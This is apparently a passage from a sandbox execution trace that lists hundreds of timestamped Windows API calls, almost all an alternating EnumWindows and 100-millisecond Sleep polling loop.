(lpEnumFunc=0x423dd0, lParam=0x410000) [0164.451] Sleep (dwMilliseconds=0x64) [0164.457] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.457] Sleep (dwMilliseconds=0x64) [0164.504] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.506] Sleep (dwMilliseconds=0x64) [0164.531] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.531] Sleep (dwMilliseconds=0x64) [0164.535] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.535] Sleep (dwMilliseconds=0x64) [0164.552] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.553] Sleep (dwMilliseconds=0x64) [0164.598] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.598] Sleep (dwMilliseconds=0x64) [0164.644] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.645] Sleep (dwMilliseconds=0x64) [0164.677] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.678] Sleep (dwMilliseconds=0x64) [0164.691] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.692] Sleep (dwMilliseconds=0x64) [0164.707] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.708] Sleep (dwMilliseconds=0x64) [0164.754] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.754] Sleep (dwMilliseconds=0x64) [0164.817] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.818] Sleep (dwMilliseconds=0x64) [0164.841] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.841] Sleep (dwMilliseconds=0x64) [0164.876] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.876] Sleep (dwMilliseconds=0x64) [0164.895] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.896] Sleep (dwMilliseconds=0x64) [0164.958] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0164.959] Sleep (dwMilliseconds=0x64) [0165.007] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.007] Sleep (dwMilliseconds=0x64) [0165.035] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.036] Sleep (dwMilliseconds=0x64) [0165.071] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.071] Sleep (dwMilliseconds=0x64) [0165.092] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.092] Sleep (dwMilliseconds=0x64) [0165.131] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.132] Sleep (dwMilliseconds=0x64) [0165.199] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.200] Sleep (dwMilliseconds=0x64) [0165.207] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.207] Sleep (dwMilliseconds=0x64) [0165.259] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.259] Sleep (dwMilliseconds=0x64) [0165.277] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.278] Sleep (dwMilliseconds=0x64) [0165.285] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.286] Sleep (dwMilliseconds=0x64) [0165.303] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.304] Sleep (dwMilliseconds=0x64) [0165.348] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.348] Sleep (dwMilliseconds=0x64) [0165.395] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.395] Sleep (dwMilliseconds=0x64) [0165.433] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.433] Sleep (dwMilliseconds=0x64) [0165.441] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.442] Sleep (dwMilliseconds=0x64) [0165.488] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.489] Sleep (dwMilliseconds=0x64) [0165.513] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.514] Sleep (dwMilliseconds=0x64) [0165.520] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.520] Sleep (dwMilliseconds=0x64) [0165.535] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.536] Sleep (dwMilliseconds=0x64) [0165.582] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.583] Sleep (dwMilliseconds=0x64) [0165.598] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.598] Sleep (dwMilliseconds=0x64) [0165.651] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.651] Sleep (dwMilliseconds=0x64) [0165.676] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.677] Sleep (dwMilliseconds=0x64) [0165.691] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.692] Sleep (dwMilliseconds=0x64) [0165.707] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.708] Sleep (dwMilliseconds=0x64) [0165.753] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.753] Sleep (dwMilliseconds=0x64) [0165.769] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.770] Sleep (dwMilliseconds=0x64) [0165.818] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.818] Sleep (dwMilliseconds=0x64) [0165.854] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.854] Sleep (dwMilliseconds=0x64) [0165.869] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.870] Sleep (dwMilliseconds=0x64) [0165.879] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.879] Sleep (dwMilliseconds=0x64) [0165.926] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.927] Sleep (dwMilliseconds=0x64) [0165.988] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0165.989] Sleep (dwMilliseconds=0x64) [0166.006] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.006] Sleep (dwMilliseconds=0x64) [0166.021] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.021] Sleep (dwMilliseconds=0x64) [0166.051] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.051] Sleep (dwMilliseconds=0x64) [0166.098] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.099] Sleep (dwMilliseconds=0x64) [0166.146] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.147] Sleep (dwMilliseconds=0x64) [0166.223] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.224] Sleep (dwMilliseconds=0x64) [0166.270] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.270] Sleep (dwMilliseconds=0x64) [0166.317] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.317] Sleep (dwMilliseconds=0x64) [0166.379] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.380] Sleep (dwMilliseconds=0x64) [0166.409] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.410] Sleep (dwMilliseconds=0x64) [0166.426] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.426] Sleep (dwMilliseconds=0x64) [0166.504] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.505] Sleep (dwMilliseconds=0x64) [0166.533] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.534] Sleep (dwMilliseconds=0x64) [0166.535] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.535] Sleep (dwMilliseconds=0x64) [0166.551] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.552] Sleep (dwMilliseconds=0x64) [0166.598] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.598] Sleep (dwMilliseconds=0x64) [0166.645] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.646] Sleep (dwMilliseconds=0x64) [0166.693] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.693] Sleep (dwMilliseconds=0x64) [0166.739] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.740] Sleep (dwMilliseconds=0x64) [0166.768] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.769] Sleep (dwMilliseconds=0x64) [0166.797] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.797] Sleep (dwMilliseconds=0x64) [0166.833] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.834] Sleep (dwMilliseconds=0x64) [0166.856] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.856] Sleep (dwMilliseconds=0x64) [0166.870] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.870] Sleep (dwMilliseconds=0x64) [0166.894] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.895] Sleep (dwMilliseconds=0x64) [0166.937] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.938] Sleep (dwMilliseconds=0x64) [0166.941] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.942] Sleep (dwMilliseconds=0x64) [0166.988] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0166.989] Sleep (dwMilliseconds=0x64) [0167.011] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.012] Sleep (dwMilliseconds=0x64) [0167.020] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.022] Sleep (dwMilliseconds=0x64) [0167.036] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.036] Sleep (dwMilliseconds=0x64) [0167.082] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.083] Sleep (dwMilliseconds=0x64) [0167.100] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.100] Sleep (dwMilliseconds=0x64) [0167.114] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.114] Sleep (dwMilliseconds=0x64) [0167.145] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.146] Sleep (dwMilliseconds=0x64) [0167.224] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.225] Sleep (dwMilliseconds=0x64) [0167.238] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.239] Sleep (dwMilliseconds=0x64) [0167.285] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.286] Sleep (dwMilliseconds=0x64) [0167.313] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.314] Sleep (dwMilliseconds=0x64) [0167.316] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.317] Sleep (dwMilliseconds=0x64) [0167.334] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.335] Sleep (dwMilliseconds=0x64) [0167.379] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.380] Sleep (dwMilliseconds=0x64) [0167.426] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.426] Sleep (dwMilliseconds=0x64) [0167.467] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.467] Sleep (dwMilliseconds=0x64) [0167.473] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.473] Sleep (dwMilliseconds=0x64) [0167.520] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.521] Sleep (dwMilliseconds=0x64) [0167.544] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.545] Sleep (dwMilliseconds=0x64) [0167.551] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.551] Sleep (dwMilliseconds=0x64) [0167.566] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.567] Sleep (dwMilliseconds=0x64) [0167.614] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.614] Sleep (dwMilliseconds=0x64) [0167.664] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.665] Sleep (dwMilliseconds=0x64) [0167.702] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.702] Sleep (dwMilliseconds=0x64) [0167.707] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.708] Sleep (dwMilliseconds=0x64) [0167.754] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.755] Sleep (dwMilliseconds=0x64) [0167.777] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.777] Sleep (dwMilliseconds=0x64) [0167.803] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.804] Sleep (dwMilliseconds=0x64) [0167.829] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.829] Sleep (dwMilliseconds=0x64) [0167.881] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.882] Sleep (dwMilliseconds=0x64) [0167.926] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.927] Sleep (dwMilliseconds=0x64) [0167.969] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.970] Sleep (dwMilliseconds=0x64) [0167.972] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0167.973] Sleep (dwMilliseconds=0x64) [0168.020] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.020] Sleep (dwMilliseconds=0x64) [0168.048] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.048] Sleep (dwMilliseconds=0x64) [0168.051] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.051] Sleep (dwMilliseconds=0x64) [0168.067] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.068] Sleep (dwMilliseconds=0x64) [0168.114] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.115] Sleep (dwMilliseconds=0x64) [0168.143] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.145] Sleep (dwMilliseconds=0x64) [0168.223] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.223] Sleep (dwMilliseconds=0x64) [0168.264] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.265] Sleep (dwMilliseconds=0x64) [0168.270] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.270] Sleep (dwMilliseconds=0x64) [0168.319] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.320] Sleep (dwMilliseconds=0x64) [0168.338] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.338] Sleep (dwMilliseconds=0x64) [0168.350] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.350] Sleep (dwMilliseconds=0x64) [0168.379] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.379] Sleep (dwMilliseconds=0x64) [0168.417] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.418] Sleep (dwMilliseconds=0x64) [0168.427] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.427] Sleep (dwMilliseconds=0x64) [0168.472] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.473] Sleep (dwMilliseconds=0x64) [0168.501] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.502] Sleep (dwMilliseconds=0x64) [0168.504] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.504] Sleep (dwMilliseconds=0x64) [0168.520] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.520] Sleep (dwMilliseconds=0x64) [0168.566] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.567] Sleep (dwMilliseconds=0x64) [0168.613] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.614] Sleep (dwMilliseconds=0x64) [0168.645] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.646] Sleep (dwMilliseconds=0x64) [0168.661] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.662] Sleep (dwMilliseconds=0x64) [0168.676] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.676] Sleep (dwMilliseconds=0x64) [0168.724] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.724] Sleep (dwMilliseconds=0x64) [0168.771] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.771] Sleep (dwMilliseconds=0x64) [0168.810] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.811] Sleep (dwMilliseconds=0x64) [0168.818] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.819] Sleep (dwMilliseconds=0x64) [0168.832] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.833] Sleep (dwMilliseconds=0x64) [0168.973] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0168.973] Sleep (dwMilliseconds=0x64) [0169.020] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.021] Sleep (dwMilliseconds=0x64) [0169.069] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.069] Sleep (dwMilliseconds=0x64) [0169.129] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.130] Sleep (dwMilliseconds=0x64) [0169.155] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.156] Sleep (dwMilliseconds=0x64) [0169.197] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.198] Sleep (dwMilliseconds=0x64) [0169.209] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.209] Sleep (dwMilliseconds=0x64) [0169.254] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.255] Sleep (dwMilliseconds=0x64) [0169.271] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.272] Sleep (dwMilliseconds=0x64) [0169.287] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.287] Sleep (dwMilliseconds=0x64) [0169.317] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.317] Sleep (dwMilliseconds=0x64) [0169.378] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.378] Sleep (dwMilliseconds=0x64) [0169.427] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.427] Sleep (dwMilliseconds=0x64) [0169.478] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.478] Sleep (dwMilliseconds=0x64) [0169.505] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.505] Sleep (dwMilliseconds=0x64) [0169.519] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.520] Sleep (dwMilliseconds=0x64) [0169.536] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.536] Sleep (dwMilliseconds=0x64) [0169.580] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.580] Sleep (dwMilliseconds=0x64) [0169.629] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.629] Sleep (dwMilliseconds=0x64) [0169.676] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.677] Sleep (dwMilliseconds=0x64) [0169.699] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.700] Sleep (dwMilliseconds=0x64) [0169.707] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.707] Sleep (dwMilliseconds=0x64) [0169.723] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.723] Sleep (dwMilliseconds=0x64) [0169.762] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.762] Sleep (dwMilliseconds=0x64) [0169.769] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.771] Sleep (dwMilliseconds=0x64) [0169.817] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.817] Sleep (dwMilliseconds=0x64) [0169.837] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.838] Sleep (dwMilliseconds=0x64) [0169.847] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.848] Sleep (dwMilliseconds=0x64) [0169.890] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.891] Sleep (dwMilliseconds=0x64) [0169.926] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.927] Sleep (dwMilliseconds=0x64) [0169.973] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0169.974] Sleep (dwMilliseconds=0x64) [0170.008] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.008] Sleep (dwMilliseconds=0x64) [0170.019] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.020] Sleep (dwMilliseconds=0x64) [0170.035] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.036] Sleep (dwMilliseconds=0x64) [0170.079] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.080] Sleep (dwMilliseconds=0x64) [0170.132] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.133] Sleep (dwMilliseconds=0x64) [0170.192] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.192] Sleep (dwMilliseconds=0x64) [0170.220] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.220] Sleep (dwMilliseconds=0x64) [0170.223] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.223] Sleep (dwMilliseconds=0x64) [0170.238] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.239] Sleep (dwMilliseconds=0x64) [0170.278] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.279] Sleep (dwMilliseconds=0x64) [0170.285] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.285] Sleep (dwMilliseconds=0x64) [0170.332] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.333] Sleep (dwMilliseconds=0x64) [0170.394] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.395] Sleep (dwMilliseconds=0x64) [0170.410] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.410] Sleep (dwMilliseconds=0x64) [0170.426] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.426] Sleep (dwMilliseconds=0x64) [0170.473] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.473] Sleep (dwMilliseconds=0x64) [0170.519] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.520] Sleep (dwMilliseconds=0x64) [0170.540] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.541] Sleep (dwMilliseconds=0x64) [0170.551] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.551] Sleep (dwMilliseconds=0x64) [0170.566] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.567] Sleep (dwMilliseconds=0x64) [0170.605] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.606] Sleep (dwMilliseconds=0x64) [0170.613] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.613] Sleep (dwMilliseconds=0x64) [0170.660] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.661] Sleep (dwMilliseconds=0x64) [0170.676] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.677] Sleep (dwMilliseconds=0x64) [0170.691] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.692] Sleep (dwMilliseconds=0x64) [0170.723] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.723] Sleep (dwMilliseconds=0x64) [0170.747] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.747] Sleep (dwMilliseconds=0x64) [0170.754] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.754] Sleep (dwMilliseconds=0x64) [0170.769] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.770] Sleep (dwMilliseconds=0x64) [0170.813] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.813] Sleep (dwMilliseconds=0x64) [0170.816] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.817] Sleep (dwMilliseconds=0x64) [0170.863] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.864] Sleep (dwMilliseconds=0x64) [0170.910] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.910] Sleep (dwMilliseconds=0x64) [0170.932] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.933] Sleep (dwMilliseconds=0x64) [0170.941] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.941] Sleep (dwMilliseconds=0x64) [0170.957] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.957] Sleep (dwMilliseconds=0x64) [0170.998] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0170.999] Sleep (dwMilliseconds=0x64) [0171.007] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.007] Sleep (dwMilliseconds=0x64) [0171.051] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.051] Sleep (dwMilliseconds=0x64) [0171.099] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.099] Sleep (dwMilliseconds=0x64) [0171.115] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.116] Sleep (dwMilliseconds=0x64) [0171.129] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.129] Sleep (dwMilliseconds=0x64) [0171.178] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.178] Sleep (dwMilliseconds=0x64) [0171.199] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.199] Sleep (dwMilliseconds=0x64) [0171.207] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.207] Sleep (dwMilliseconds=0x64) [0171.223] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.223] Sleep (dwMilliseconds=0x64) [0171.262] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.263] Sleep (dwMilliseconds=0x64) [0171.269] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.270] Sleep (dwMilliseconds=0x64) [0171.371] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.372] Sleep (dwMilliseconds=0x64) [0171.380] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.380] Sleep (dwMilliseconds=0x64) [0171.394] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.395] Sleep (dwMilliseconds=0x64) [0171.426] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.426] Sleep (dwMilliseconds=0x64) [0171.451] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.452] Sleep (dwMilliseconds=0x64) [0171.457] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.457] Sleep (dwMilliseconds=0x64) [0171.473] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.474] Sleep (dwMilliseconds=0x64) [0171.511] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.511] Sleep (dwMilliseconds=0x64) [0171.519] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.520] Sleep (dwMilliseconds=0x64) [0171.566] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.567] Sleep (dwMilliseconds=0x64) [0171.613] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.614] Sleep (dwMilliseconds=0x64) [0171.633] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.633] Sleep (dwMilliseconds=0x64) [0171.644] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.645] Sleep (dwMilliseconds=0x64) [0171.660] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.660] Sleep (dwMilliseconds=0x64) [0171.695] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.695] Sleep (dwMilliseconds=0x64) [0171.710] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.710] Sleep (dwMilliseconds=0x64) [0171.754] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.754] Sleep (dwMilliseconds=0x64) [0171.816] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.817] Sleep (dwMilliseconds=0x64) [0171.863] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.864] Sleep (dwMilliseconds=0x64) [0171.895] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.896] Sleep (dwMilliseconds=0x64) [0171.910] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.911] Sleep (dwMilliseconds=0x64) [0171.957] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.958] Sleep (dwMilliseconds=0x64) [0171.974] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.975] Sleep (dwMilliseconds=0x64) [0171.988] 